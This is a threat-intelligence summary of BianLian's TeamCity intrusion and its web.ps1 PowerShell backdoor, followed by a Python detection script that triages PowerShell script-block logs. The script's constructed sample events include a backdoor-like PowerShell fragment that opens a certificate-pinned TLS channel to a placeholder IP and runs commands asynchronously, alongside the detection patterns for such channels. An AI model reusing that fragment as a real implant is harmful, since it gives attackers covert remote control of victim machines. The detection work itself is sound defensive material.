Summary
This article describes a recent intrusion by the BianLian threat group. BianLian gained access to a victim's network by exploiting a vulnerability in a TeamCity server and then deployed a PowerShell backdoor. Researchers at GuidePoint analyzed the backdoor and attributed it to BianLian with high confidence.
Highlights
- BianLian exploited a TeamCity authentication bypass vulnerability (CVE-2024-27198 or CVE-2023-42793) to gain initial access.
- After gaining access, they abused the legitimate open-source winpty components (winpty-agent.exe and winpty.dll) to pivot to build servers on the victim's network.
- They deployed a malicious PowerShell script (web.ps1) that functioned as a backdoor.
- The backdoor used an encrypted channel to communicate with the BianLian command and control (C2) server.
- Researchers de-obfuscated and analyzed the backdoor script.
- The backdoor combined asynchronous execution with certificate validation on its C2 channel, which makes the implant harder to inspect and disrupt.
- BianLian's adoption of a PowerShell backdoor reflects the group's continued adaptation of its tooling to defensive pressure.
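As an added example (not code from the original article or from GuidePoint), the following Python triages PowerShell ScriptBlock log entries (Event ID 4104) for the combination of capabilities the highlights attribute to web.ps1: a TLS-wrapped C2 socket, certificate handling, and asynchronous execution via runspaces. The indicator patterns, the verdict thresholds, and the sample events (paths, IPs, script text) are all constructed for this example and are not indicators taken from the GuidePoint analysis.

```python
import re

# Indicator families. The highlights attribute three capabilities to web.ps1:
# an encrypted C2 channel, certificate validation, and asynchronous execution.
# Each family lists .NET/PowerShell primitives a script needs for that
# capability. The list is an assumption made for this example, not a set of
# indicators from the GuidePoint analysis.
INDICATOR_FAMILIES = {
    "encrypted_channel": [
        ("TcpClient", r"Net\.Sockets\.TcpClient"),
        ("SslStream", r"Net\.Security\.SslStream"),
        ("AuthenticateAsClient", r"\.AuthenticateAsClient\("),
    ],
    "certificate_handling": [
        ("RemoteCertificateValidationCallback", r"RemoteCertificateValidationCallback"),
        ("ServerCertificateValidationCallback", r"ServerCertificateValidationCallback"),
        ("X509Certificate", r"X509Certificate"),
    ],
    "async_execution": [
        ("RunspaceFactory", r"RunspaceFactory"),
        ("BeginInvoke", r"\.BeginInvoke\("),
    ],
}


def normalize(script_text: str) -> str:
    """Undo cheap obfuscation before matching. A backtick inside a bareword
    (Ne`w-Ob`ject) is accepted by the parser and changes nothing, so backticks
    are stripped; case is handled with re.IGNORECASE because PowerShell is
    case-insensitive. Inside double-quoted strings a backtick is an escape
    (`n, `t); losing that does not affect class-name matching."""
    return script_text.replace("`", "")


def match_indicators(script_text: str) -> dict:
    """Return {family: [matched labels]} for every family with at least one hit."""
    text = normalize(script_text)
    hits = {}
    for family, patterns in INDICATOR_FAMILIES.items():
        found = [label for label, pat in patterns if re.search(pat, text, re.IGNORECASE)]
        if found:
            hits[family] = found
    return hits


def classify(script_text: str) -> str:
    """Verdict from how many capability families co-occur in one script block.
    Thresholds are a triage heuristic chosen for this example: a TLS client or
    a runspace pool alone is routine admin code; all three together is not."""
    families = len(match_indicators(script_text))
    if families == 3:
        return "high"
    if families == 2:
        return "medium"
    return "low"


def reassemble_script_blocks(events: list) -> dict:
    """Group 4104 fragments by ScriptBlockId and join them in MessageNumber
    order. Long scripts are logged as several 4104 events, and scoring each
    fragment on its own can leave every piece below threshold."""
    by_id = {}
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        by_id.setdefault(ev["ScriptBlockId"], []).append(ev)
    blocks = {}
    for sbid, frags in by_id.items():
        frags.sort(key=lambda e: e["MessageNumber"])
        blocks[sbid] = {
            "Path": frags[0].get("Path", ""),
            "ScriptBlockText": "".join(f["ScriptBlockText"] for f in frags),
        }
    return blocks


def triage(events: list) -> dict:
    """Return {ScriptBlockId: (verdict, matched families)} for every block."""
    result = {}
    for sbid, block in reassemble_script_blocks(events).items():
        text = block["ScriptBlockText"]
        result[sbid] = (classify(text), match_indicators(text))
    return result


# Constructed sample 4104 events (not real log data). Field names follow the
# Microsoft-Windows-PowerShell/Operational 4104 schema; paths and IPs are made up.
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 1,
     "Path": "C:\\ops\\inventory.ps1",
     "ScriptBlockText": "Get-ChildItem C:\\Windows\\Temp | Where-Object Length -gt 1MB"},
    {"EventID": 4104, "ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "Path": "C:\\ops\\parallel.ps1",
     "ScriptBlockText": "$pool = [RunspaceFactory]::CreateRunspacePool(1, 8); $pool.Open(); "
                        "$ps = [PowerShell]::Create(); $ps.RunspacePool = $pool; $h = $ps.BeginInvoke()"},
    # Hypothetical backdoor-like script split across two fragments, with backticks in class names.
    {"EventID": 4104, "ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 2,
     "Path": "C:\\Users\\Public\\web.ps1",
     "ScriptBlockText": "$c = New-Object Net.Sock`ets.Tcp`Client('203.0.113.10', 443); "
                        "$s = New-Object Net.Secur`ity.Ssl`Stream($c.GetStream(), $false, "
                        "[Net.Security.RemoteCertificateValidationCallback]"
                        "{ param($o, $cert, $chain, $e) $cert.Thumbprint -eq $pin }); "},
    {"EventID": 4104, "ScriptBlockId": "c3", "MessageNumber": 2, "MessageTotal": 2,
     "Path": "C:\\Users\\Public\\web.ps1",
     "ScriptBlockText": "$s.Authenticate`AsClient('203.0.113.10'); "
                        "$ps = [PowerShell]::Create(); $null = $ps.AddScript($cmd); $h = $ps.BeginInvoke()"},
]

if __name__ == "__main__":
    for sbid, (verdict, hits) in triage(SAMPLE_EVENTS).items():
        print(f"{sbid}: {verdict:6} {sorted(hits)}")
```

Two design choices matter here. First, scoring is by co-occurrence of capability families rather than by any single string, because a TLS client or a runspace pool on its own is common in legitimate automation; in the constructed data the parallel-job script (b2) stays low while the two web.ps1 fragments only reach high once reassembled. Second, reassembly by ScriptBlockId is essential: each fragment of c3 alone scores only medium. Heavier obfuscation (string concatenation, -join, reflection over type names) defeats plain class-name matching, so this is a first-pass triage filter, not a signature for BianLian's backdoor.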
https://www.guidepointsecurity.com/blog/bianlian-gos-for-powershell-after-teamcity-exploitation/